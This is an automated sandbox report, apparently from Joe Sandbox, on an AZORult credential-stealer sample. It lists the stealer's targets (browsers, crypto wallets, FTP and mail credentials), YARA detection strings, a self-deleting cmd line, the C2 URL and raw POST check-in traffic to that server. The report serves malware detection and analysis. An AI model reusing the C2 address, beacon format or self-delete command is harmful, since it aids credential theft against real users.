Windows Analysis Report
Po#70831.exe

Overview

General Information

Sample name:Po#70831.exe
Analysis ID:1501074
MD5:bde0b7ff5003da14df7675564d5a8f6a
SHA1:e72691a96a386c72392375969f0426361e167d3b
SHA256:af44fccdfe3d6e7f65283d47f4a121bd70000dbcf1d8d91aead1c124cd808554
Tags:exe

Detection

Azorult
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Azorult
Yara detected Azorult Info Stealer
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
OS version to string mapping found (often used in BOTs)
PE file contains sections with non-standard names
PE file does not import any functions
Potential key logger detected (key state polling based)
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • Po#70831.exe (PID: 6900 cmdline: "C:\Users\user\Desktop\Po#70831.exe" MD5: BDE0B7FF5003DA14DF7675564D5A8F6A)
    • svchost.exe (PID: 4396 cmdline: "C:\Users\user\Desktop\Po#70831.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • cmd.exe (PID: 4488 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "svchost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 2324 cmdline: C:\Windows\system32\timeout.exe 3 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup
Name: Azorult
Description: AZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit.
Attribution: The Gorgon Group
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult
{"C2 url": "http://ln6b9.shop/LN341/index.php"}
Source | Rule | Description | Author | Strings
00000002.00000002.2483316959.0000000004DA0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security
00000002.00000002.2484833657.00000000067AC000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security
00000002.00000002.2483360582.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security
00000002.00000002.2482219448.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_Azorult | Yara detected Azorult Info Stealer | Joe Security
00000002.00000002.2482219448.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security

Source | Rule | Description | Author | Strings
0.2.Po#70831.exe.36e0000.1.unpack | JoeSecurity_Azorult | Yara detected Azorult Info Stealer | Joe Security
0.2.Po#70831.exe.36e0000.1.unpack | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security
0.2.Po#70831.exe.36e0000.1.unpack | Windows_Trojan_Azorult_38fce9ea | unknown | unknown
  • 0x18c50:$a1: /c %WINDIR%\system32\timeout.exe 3 & del "
  • 0xbf78:$a2: %APPDATA%\.purple\accounts.xml
  • 0xc6c0:$a3: %TEMP%\curbuf.dat
  • 0x189d4:$a4: PasswordsList.txt
  • 0x139d8:$a5: Software\Valve\Steam
0.2.Po#70831.exe.36e0000.1.unpack | Azorult_1 | Azorult Payload | kevoreilly
  • 0x17078:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ...
  • 0x114ac:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
0.2.Po#70831.exe.36e0000.1.unpack | Azorult | detect Azorult in memory | JPCERT/CC Incident Response Group
  • 0x16e18:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  • 0x17478:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  • 0x18b60:$v2: http://ip-api.com/json
  • 0x177d2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34

                System Summary

                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Po#70831.exe", CommandLine: "C:\Users\user\Desktop\Po#70831.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Po#70831.exe", ParentImage: C:\Users\user\Desktop\Po#70831.exe, ParentProcessId: 6900, ParentProcessName: Po#70831.exe, ProcessCommandLine: "C:\Users\user\Desktop\Po#70831.exe", ProcessId: 4396, ProcessName: svchost.exe
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Po#70831.exe", CommandLine: "C:\Users\user\Desktop\Po#70831.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Po#70831.exe", ParentImage: C:\Users\user\Desktop\Po#70831.exe, ParentProcessId: 6900, ParentProcessName: Po#70831.exe, ProcessCommandLine: "C:\Users\user\Desktop\Po#70831.exe", ProcessId: 4396, ProcessName: svchost.exe
                Timestamp:2024-08-29T12:02:33.732607+0200
                SID:2029136
                Severity:1
                Source Port:80
                Destination Port:49717
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-08-29T12:02:42.498882+0200
                SID:2029467
                Severity:1
                Source Port:49718
                Destination Port:80
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-08-29T12:02:33.484339+0200
                SID:2029467
                Severity:1
                Source Port:49717
                Destination Port:80
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-08-29T12:02:33.484339+0200
                SID:2810276
                Severity:1
                Source Port:49717
                Destination Port:80
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected

                AV Detection

                Source: http://ln6b9.shop/LN341/index.php, Avira URL Cloud: Label: malware
                Source: 00000000.00000002.2377127925.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, Malware Configuration Extractor: Azorult {"C2 url": "http://ln6b9.shop/LN341/index.php"}
                Source: http://ln6b9.shop/LN341/index.php, Virustotal: Detection: 9%
                Source: Po#70831.exe, Virustotal: Detection: 33%
                Source: Po#70831.exe, ReversingLabs: Detection: 71%
                Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                Source: Po#70831.exe, Joe Sandbox ML: detected
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004094C4 CryptUnprotectData,LocalFree,2_2_004094C4
                Source: Po#70831.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.2.dr
                Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.2.dr
                Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.2.dr
                Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.2.dr
                Source: Binary string: ucrtbase.pdb source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.2.dr
                Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-memory-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-debug-l1-1-0.dll.2.dr
                Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.2.dr
                Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.2.dr
                Source: Binary string: wntdll.pdb source: Po#70831.exe, 00000000.00000003.2368245174.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, Po#70831.exe, 00000000.00000003.2368365177.0000000003C50000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-environment-l1-1-0.dll.2.dr
                Source: Binary string: vcruntime140.i386.pdbGCTL source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.2.dr
                Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.2.dr
                Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.2.dr
                Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.2.dr
                Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-private-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.2.dr
                Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.2.dr
                Source: Binary string: msvcp140.i386.pdb source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.2.dr
                Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.2.dr
                Source: Binary string: ucrtbase.pdbUGP source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.2.dr
                Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-time-l1-1-0.dll.2.dr
                Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.2.dr
                Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.2.dr
                Source: Binary string: wntdll.pdbUGP source: Po#70831.exe, 00000000.00000003.2368245174.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, Po#70831.exe, 00000000.00000003.2368365177.0000000003C50000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.2.dr
                Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.2.dr
                Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.2.dr
                Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.2.dr
                Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.2.dr
                Source: Binary string: vcruntime140.i386.pdb source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.2.dr
                Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-utility-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.2.dr
                Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.2.dr
                Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-string-l1-1-0.dll.2.dr
                Source: Binary string: msvcp140.i386.pdbGCTL source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.2.dr
                Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l2-1-0.dll.2.dr
                Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.2.dr
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004FDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_004FDBBE
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004CC2A2 FindFirstFileExW,0_2_004CC2A2
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_005068EE FindFirstFileW,FindClose,0_2_005068EE
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_0050698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0050698F
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004FD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004FD076
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004FD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004FD3A9
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_00509642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00509642
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_0050979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0050979D
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_00509B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00509B2B
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_00505C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00505C97
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004098A0 FindFirstFileW,FindNextFileW,FindClose,2_2_004098A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D0A0 FindFirstFileW,2_2_0040D0A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,2_2_00414408
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00408D44 FindFirstFileW,GetFileAttributesW,FindNextFileW,2_2_00408D44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00415610 FindFirstFileW,FindNextFileW,FindClose,2_2_00415610
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004087DC FreeLibrary,FindFirstFileW,DeleteFileW,FindNextFileW,SetCurrentDirectoryW,RemoveDirectoryW,2_2_004087DC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D06E FindFirstFileW,2_2_0040D06E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041303C FindFirstFileW,FindNextFileW,FindClose,2_2_0041303C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040989F FindFirstFileW,FindNextFileW,FindClose,2_2_0040989F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004111C4 FindFirstFileW,FindNextFileW,FindClose,2_2_004111C4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,2_2_00412D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00408D3C FindFirstFileW,GetFileAttributesW,FindNextFileW,2_2_00408D3C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041158C FindFirstFileW,FindNextFileW,FindClose,2_2_0041158C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411590 FindFirstFileW,FindNextFileW,FindClose,2_2_00411590
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00412D9C FindFirstFileW,FindNextFileW,FindClose,2_2_00412D9C

                Networking

                Source: Network trafficSuricata IDS: 2029467 - Severity 1 - ET MALWARE Win32/AZORult V3.3 Client Checkin M14 : 192.168.2.6:49717 -> 172.67.128.117:80
                Source: Network trafficSuricata IDS: 2810276 - Severity 1 - ETPRO MALWARE AZORult CnC Beacon M1 : 192.168.2.6:49717 -> 172.67.128.117:80
                Source: Network trafficSuricata IDS: 2029136 - Severity 1 - ET MALWARE AZORult v3.3 Server Response M1 : 172.67.128.117:80 -> 192.168.2.6:49717
                Source: Network trafficSuricata IDS: 2029467 - Severity 1 - ET MALWARE Win32/AZORult V3.3 Client Checkin M14 : 192.168.2.6:49718 -> 172.67.128.117:80
                Source: C:\Windows\SysWOW64\svchost.exe, Network Connect: 172.67.128.117 80
                Source: Malware configuration extractorURLs: http://ln6b9.shop/LN341/index.php
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: global trafficHTTP traffic detected: POST /LN341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: ln6b9.shopContent-Length: 109Cache-Control: no-cacheData Raw: 00 00 00 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 62 ef 26 66 99 26 66 9a 26 66 9f 26 66 9e 26 66 99 26 66 97 26 67 ea 46 13 8b 30 67 ed 45 17 8b 30 60 8b 30 66 8b 31 11 ef 26 66 96 42 70 9d 35 70 9d 3a 70 9d 32 70 9d 34 70 9d 3b Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410b&f&f&f&f&f&f&gF0gE0`0f1&fBp5p:p2p4p;
                Source: global trafficHTTP traffic detected: POST /LN341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: ln6b9.shopContent-Length: 33917Cache-Control: no-cache
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_0050CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_0050CE44
                Source: global trafficDNS traffic detected: DNS query: ln6b9.shop
                Source: unknownHTTP traffic detected: POST /LN341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: ln6b9.shopContent-Length: 109Cache-Control: no-cacheData Raw: 00 00 00 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 62 ef 26 66 99 26 66 9a 26 66 9f 26 66 9e 26 66 99 26 66 97 26 67 ea 46 13 8b 30 67 ed 45 17 8b 30 60 8b 30 66 8b 31 11 ef 26 66 96 42 70 9d 35 70 9d 3a 70 9d 32 70 9d 34 70 9d 3b Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410b&f&f&f&f&f&f&gF0gE0`0f1&fBp5p:p2p4p;
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.2.dr, nssdbm3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
